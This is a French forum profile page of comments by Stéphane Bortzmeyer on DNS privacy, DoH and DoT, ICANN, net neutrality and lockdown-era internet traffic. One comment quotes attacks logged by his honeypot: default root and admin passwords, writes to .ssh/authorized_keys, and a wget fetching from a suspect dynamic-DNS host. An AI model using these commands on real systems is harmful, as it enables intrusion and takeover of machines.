votre avatar Abonné

Stéphane Bortzmeyer

est avec nous depuis le 23 février 2016 ❤️

360 commentaires

Le 23/03/2020 à 07h 46

« Je vous laisse imaginer le casse-tête pour l’Education nationale. » C’est bizarre, cette phrase dans un commentaire parlant des VPN, et de la redistribution du trafic. L’Éducation Nationale fournit des accès VPN aux élèves, aux enseignements du primaire et du secondaire, aux étudiants ? (Réponse : non.)

Le 23/03/2020 à 07h 44

  « Il y a pas mal d’inexactitudes publiés dans l’article chez Framasoft » Je veux bien une liste, même partielle.

Le 23/03/2020 à 07h 39

« la neutralité n’existe plus depuis bien longtemps » C’est le discours classique des telcos depuis de nombreuses années, finalement, le confinement n’a rien changé, les mêmes arguments ressortent.



Il y a un élement vrai dedans : de nombreux opérateurs violent la neutralité du réseau. Après, par quel miracle faudrait-il renoncer à un principe parce qu’il est largement violé, cela m’échappe. Cela me parait plutôt une raison pour le défendre, au contraire.



(Et concernant la domination d’un petit nombre d’acteurs, les solutions sont connues : pair-à-pair, décentralisation, fédération, etc. Curieusement, ce sont justement les techniques que les telcos combattent.)

Le 23/03/2020 à 07h 33

Notons que l’augmentation de la capacité réseau va devenir de plus en plus difficile au fur et à mesure qu’on s’enfonce dans le confinement : travaux et déplacements suspendus, pièces qui n’arrivent plus de Chine, datacenters inaccessibles (Equinix désormais presque fermé…) À moyen terme, c’est cela qui m’inquiète davantage  que Disney. (Cf. l’excellent exposé de Job Snydershttp://instituut.net/~job/netops_during_pandemics.pdf

Le 23/03/2020 à 07h 30

Mais la question du « dernier kilomètre » est complètement différente, car, là, l’occupation du tuyau dépend entièrement de l’utilisateur (sauf attaque DoS). Ne pas lancer l’offre de Disney ou pas ne changera rien. Si M. Michu craint pour son tuyau, il peut ne pas regarder de vidéos. Le dernier kilomètre, quand il a une capacité restreinte, est le lieu des choix individuels, qu’on n’impose pas aux autres et qui ne dépend pas de leurs choix.

Le 22/03/2020 à 10h 31

Sinon, les lecteurs de NextInpact connaissent tout cela, mais si vous voulez expliquer la situation à vos proches, vous serez peut-être intéressé·e·s (DANGER : PUB) par mon article sur l’Internet en temps de confinement :https://framablog.org/2020/03/21/linternet-pendant-le-confinement/

Le 22/03/2020 à 10h 29

« Est-ce que leur datacenter pour la France est super mal placé par rapport à l’agencement des réseaux ? » Pour l’instant oui. Netflix a mis des caches dans tous les FAI (ce qui pose d’autres problèmes, question neutralité du réseau), pas Disney+. Je ne défends pas la décision du gouvernement, hein, elle relève du bougisme (« il faut faire quelque chose, n’importe quoi ! »), j’explique juste qu’il y a apparemment une réelle différence entre Disney et Netflix.

Le 19/03/2020 à 08h 20

Et il y a un site Web derrière. Est-ce que laver les voitures contribue à lutter contre le virus ?

Le 19/03/2020 à 08h 19

Je ne vois pas coronavirus-gouv.fr. Déjà supprimé, sans doute.

Le 17/03/2020 à 07h 46

Pour ceux et celles qui ont du mal à télécharger l’attestation de déplacement (le site du Ministère ne tient pas la charge), elle est en BitTorrent :



magnet:?xt=urn:btih:26586CED67BBB44FA0B493DE5D442BB031EBF8F6&dn=Attestation_de_deplacement_derogatoire.pdf

Le 16/03/2020 à 14h 02

Je n’ai pas vu passer ce problème DNS Orange. Des détails techniques précis ?

Le 16/03/2020 à 14h 01

« a fortiori lorsque des millions d’enfants téléchargent la dernière mise à jour de 25 Go en même temps » Quelqu’un leur explique BitTorrent ? (Et le pair-à-pair de manière générale.)

 

Le 14/03/2020 à 14h 23

Comme je disais, c’est long, compliqué et cher.



Il n’y a pas d’ouverture en ce moment, on parle d’un prochain cycle de candidatures en 2021 ou 2022. Prix pas encore connu. Attention, les frais de dossier ne sont qu’une petite partie de ce qu’il faut payer.

Le 14/03/2020 à 07h 24

« - Concernant le .Org, comment est-ce possible qu’une société se soit approprié et se donne le droit de vendre un bien commun datant du début de l’Internet?  »



Je suis d’accord, c’est scandaleux.

Le 14/03/2020 à 07h 23

« - Qui prend / Comment on été prisent les décisions de créer des nouveaux TLD? »



Deux cas, les TLD ICANN et les autres.



Pour les TLD ICANN, c’est l’ICANN. Le mécanisme, long, compliqué et cher, est certes très contestable mais,à la décharge de l’ICANN, il faut préciser que personne n’a encore trouvé un mécanisme correct (les idées sont les bienvenues mais le problème est vraiment très difficile ; pensez par exemple au .ISLAM, à qui l’attribuer ?).



Pour les TLD autres, ils dépendent d’un pays. La création de .SS était automatique à l’indépendance du Soudan du Sud. La suppression dépend du bon vouloir du pays (cf. le feuilleton du .SU, qui se porte toujours bien, 28 ans après la fin de l’Union Soviétique). Il reste les cas difficiles comme .EH mais ceux-ci sont difficiles de toute façon. Là encore, personne n’a de solution miracle pour résoudre ces problèmes.

Le 14/03/2020 à 07h 15

« - L’argent suffit t’elle à ce que l’IANA reste indépendante? L’est elle vraiment? »



L’indépendance est une notion complexe. Indépendant de qui ? La gestion de la racine n’est pas vraiment indépendante du gouvernement des États-Unis, qui continue à déléguer son fonctionnement à Verisign. Quant à l’ICANN, indépendante du gouvernement des États-Unis ne signifie pas indépendante de la vision états-unienne du monde (aux réunions ICANN, une bonne partie de la soi-disant diversité, les gens qui prétendent représenter l’Afrique, par exemple, sont des gens qui vivent et travaillent aux USA depuis 30 ans…). Et l’ICANN est très marquée par l’idéologie capitaliste (cf. la vente de .org).



 

Le 14/03/2020 à 07h 11

« Est ce que tout l’argent gagné a créer des tld “à la con” sert uniquement les intérêts de l’IANA? »



Une bonne partie de la motivation pour cet argent est juridique. L’ICANN étant une boîte privée, elle ne bénéficie pas de l’impunité juridique dont jouit, par exemple, un gouvernement ou une organisation internationale. Le système juridique étatsunien étant propice aux DoS, il faut être gros pour tenir le coup.



 

Le 14/03/2020 à 07h 08

« voir une racine alternative sérieuse (je sais qu’il y en a, mais rien qui ne prend de l’ampleur) »



Le problème des racines alternatives n’est pas technique (monter une racine simple est très facile, cf. le projet Yetihttps://www.afnic.fr/fr/ressources/blog/le-projet-yeti-d-experimentation-d-une-r… monter une vraie racine de production est évidemment plus difficile mais on sait faire). Il est 100 % politique : qui va la diriger ? Les russes ? Les chinois ? Google ? Facebook ? Moi (je veux bien devenir Dictateur en Chef de l’Internet Mondial) ?



Qu’on ne me dise pas qu’il faut qu’elle soit gérée démocratiquement par les utilisateurs. Quand c’est trois types dans leur garage, ça va. Mais à l’échelle mondiale ?

Le 14/03/2020 à 07h 02

  « à quand la possibilité d’interroger les serveurs racine, TLD/SLD directement via DoH, DoT ou autre ? »



On y  travaille (dans le groupe de travail DPRIVE de l’IETF) et des expérimentations existent (les serveurs faisant autorité pour facebook.com répondent déjà en DoT). L’authentifictaion n’est pas triviale car un client d’un résolveur ne parle qu’à deux ou trois résolveurs, mais un résolveur parle à des milliers de serveurs faisant autorité. Les solutions d’authentification évidentes utilisent le DNS mais on a alors un problème d’œuf et de poule. Mais on avance.

Le 14/03/2020 à 06h 58

Sur la résistance aux dDoS, j’ai des doutes sérieux : UDP est au contraire bien plus vulnérable, puisqu’il n’y a aucune authentification, même minimale, de l’adresse IP source.



Sur le résolveur local, cela n’a rien d’utopique, c’est assez facile à faire et des tas de gens le font.

Le 12/03/2020 à 13h 33

Non, ce n’est pas exact. DNSSEC est de bout en bout, puisque la signature est faite par le serveur maitre. (Sur .fr, c’est même un maitre caché, sans accès public depuis l’Internet, donc plus difficile à pirater.) Donc, rien à voir avec « celui à qui on a demandé la résolution ». 



Quant aux résolveurs menteurs, DNSSEC ne supprime pas la nécessité d’avoir un résolveur de confiance (soit sur son réseau local, ce qui est quand même recommandé, soit distant et sécurisé par DoT ou DoH.)

Le 12/03/2020 à 12h 14

DNSSEC signe cryptographiquement les données, et le résolveur peut donc facilement vérifier que la donnée est correcte.

Le 12/03/2020 à 10h 51

Ça aggrave même les problèmes de vie privée, en envoyant la requête à davantage de monde.



Si le but est juste de savoir quelle est la bonne réponse, DNSSEC me parait une approche préférable.

Le 12/03/2020 à 10h 50

En sécurité, il n’y a JAMAIS de solution parfaite.

Le 12/03/2020 à 08h 58

Là, on fera du SNI chiffré, du domain fronting… La lutte de l’épée et de la cuirasse est éternelle.

Le 12/03/2020 à 08h 31

Il n’y a pas le choix : dans beaucoup d’endroits (notamment les hotspots Wifi d’hôtels ou d’aéroports), seuls 80 et 443 passent. Tout sur HTTPS n ‘est pas un choix, c’est une obligation.

Le 12/03/2020 à 08h 28

Sans problème, un exemple avec mon résolveur personnel :https://www.bortzmeyer.org/doh-mon-resolveur.html

Le 12/03/2020 à 08h 24

Rien à voir avec DoH qui n’est après tout qu’un protocole. Quand la moitié du courrier électronique file chez Gmail, est-ce qu’on dit que SMTP est « centralisé ».



DoH n’implique pas du tout d’aller chez CloudFlare. L’article donne d’ailleurs une liste de résolveurs DoH. J’y ajoute le mien, pendant qu’on y est, cf.https://www.bortzmeyer.org/doh-bortzmeyer-fr-policy.html

Le 12/03/2020 à 08h 22

D’abord, il est tout à fait faux, comme on le lit souvent, que DoT (DNS sur TLS) serait « dans l’OS » alors que DoH (DNS sur HTTPS) serait « dans le navigateur ». Les deux techniques (et le DNS classique) peuvent parfaitement être déployées dans l’OS ou dans l’application. Zéro différence entre DoT et DoH sur ce point.https://www.bortzmeyer.org/doh-et-ses-adversaires.html



Ensuite, DoT est déployé, la plupart des résolveurs DoH acceptent également DoT, Android a DoT en standard depuis une ou deux versions, etc. Chacun peut choisir.

Le 12/03/2020 à 08h 19

Faire du DoH au dessus de Tor serait plus simple et donnerait le même résultat.

Le 12/03/2020 à 08h 19

Deux solutions : 1) ignorer le problème car ce n’est pas la même chose que de dire qu’on utilise tel ou tel résolveur, que de dire qu’on visite pornhub.com ou alcooloques-anonymes.org 2) Mettre l’adresse de Quad9 au lieu de son nom.

Le 14/03/2020 à 06h 55

Les émojis ne sont qu’une minorité (cf. mon article pour les chiffres exacts). La majorité des caractères Unicode sont des sinogrammes, et donc sont utiles.

Le 14/03/2020 à 06h 54

Faudrait que les masculinistes écrivent une propal au consortium Unicode. C’est du travail, ça va les fatiguer.

Le 12/03/2020 à 10h 56

Aucun rapport, le contraire de trans, ce n’est pas hétérosexuel (dont le contraire est homesexuel). Identité de genre ≠ orientation sexuelle.

Le 05/03/2020 à 08h 28

Vu par les sondes RIPE Atlas, ça donne ça :https://framagit.org/snippets/5051

Le 24/02/2020 à 16h 28

Le numérique et l’Internet regorgent de sujets qui sont à la fois très présents et jamais expliqués et contextualisés en partant du début. Si on n’a pas suivi tous les épisodes précédents, ces sujets sont très difficiles à suivre.



La forme papier me parait bien adaptée à des articles de fond, plus

déconnectés de l’actualité, et reprenant un sujet complexe depuis le

début (comme ceux sur Hadopi et sur la copie privée, dans le premier

numéro).



Quelques suggestions, où vous allez probablement dire « mais tout le monde connait cela » mais où je soupçonne que pas mal de lecteurs seraient ravis qu’on reprenne calmement : le logiciel libre, le chiffrement, la neutralité, IPv6, la blockchain, etc.

Le 24/02/2020 à 12h 58

“Signal … Amazon” Source ? Je ne vois rien de tel avec Signal. D’où vient cette information ?

Le 17/02/2020 à 10h 11

Je ne connaissais même pas ce “Global Digital Marketing”. Vu son nom, je suis plutôt content qu’il soit annulé.

Le 04/02/2020 à 09h 07

J’en profite pour rappeler qu’il faut utiliser une supervision automatique de ses certificats, pour éviter celahttps://www.bortzmeyer.org/tester-expiration-certifs.html

Le 22/01/2020 à 13h 04

C’est très rigolo de regarder ce que tapent les bots. Ce matin :

 

root / root@1234 et admin / 123456 -> écriture dans .ssh/authorized_keys

 

admin / admin -&gt;&nbsp; wgethttp://parabellum.ddnsgeek.com<img data-src=" />08…

&nbsp;

root / root -&gt;

ps -ef | grep ‘[Mm]iner’

Le 22/01/2020 à 11h 38

Dans le lot, il doit y avoir mon pot de miel (“honeypot”, en anglosaxonien) à la maison puisqu’il répond en telnet (port 23) et SSH (port 22) et accepte tous les logins / mots de passe essayés (souvent root/admin), puis enregistre les commandes tapées (de uname à wget). Bref, une telle base constituée automatiquement va comporter un certain nombre de faux positifs.



&nbsp;PS : Shodan fournit déjà la liste des machines qui répondent en telnet.

Le 09/01/2020 à 12h 31

Excellente nouvelle. Bravo, la SACEM. J’espère que cela mettra fin à cette pratique insupportable du bruit imposé dans les parties communes de l’hôtel.

Le 18/12/2019 à 16h 19

Si on ne contrôle pas la machine de l’utilisateur, c’est en effet game over. Même sans DoH, le navigateur peut toujours faire des requêtes DNS/DoT/Namecoin/ce qu’il veut.



Et la seule vraie protection, ce sont des parents disponibles, et qui éduquent. Oui.

Le 18/12/2019 à 14h 30

« les solutions de contrôle parental deviennent inopérantes » C’est tellement résumé que ça en devient n’importe quoi. Non, les seules solutions de contrôle parental qui sont impactées sont celles extérieures à la machine, et utilisant le DNS, donc une minorité.

Le 09/10/2019 à 08h 40

On me fait remarquer que le code Javascript de ce portail fait une requête vers un domaine personnel, àhttps://api-codes-sources-fr.antoine-augusti.fr. C’est dur, le RGPD.

Le 02/10/2019 à 09h 34

Le problème de ce qui est disponible dans les systèmes d’exploitation est secondaire (tout le monde utilise un Unix donc a SCTP depuis longtemps, par exemple) par rapport au problème des middleboxes (boitiers intermédiaires) qui bloquent tout ce qu’ils ne connaissent pas.

Le 01/10/2019 à 09h 21

Le navigateur ne peut pas faire la résolution en TLS, il n’y a pas (encore ?) de norme pour parler en TLS aux serveurs faisant autorité. (Le RFC 7858, DNS sur TLS, est pour le lien entre M. Michu et le résolveur.)

&nbsp;

Le 30/09/2019 à 15h 25

Le RFC n’est pas encore sorti. Il existe des mises en œuvre en logiciel libre (dont une de Cloudflare) mais rien de très intégré aux serveurs HTTP existants, je crois.

Le 30/09/2019 à 11h 45

Euh non, rien à voir. Vous confondez DoH (un protocole) avec Cloudflare (une société).https://www.bortzmeyer.org/doh-et-ses-adversaires.html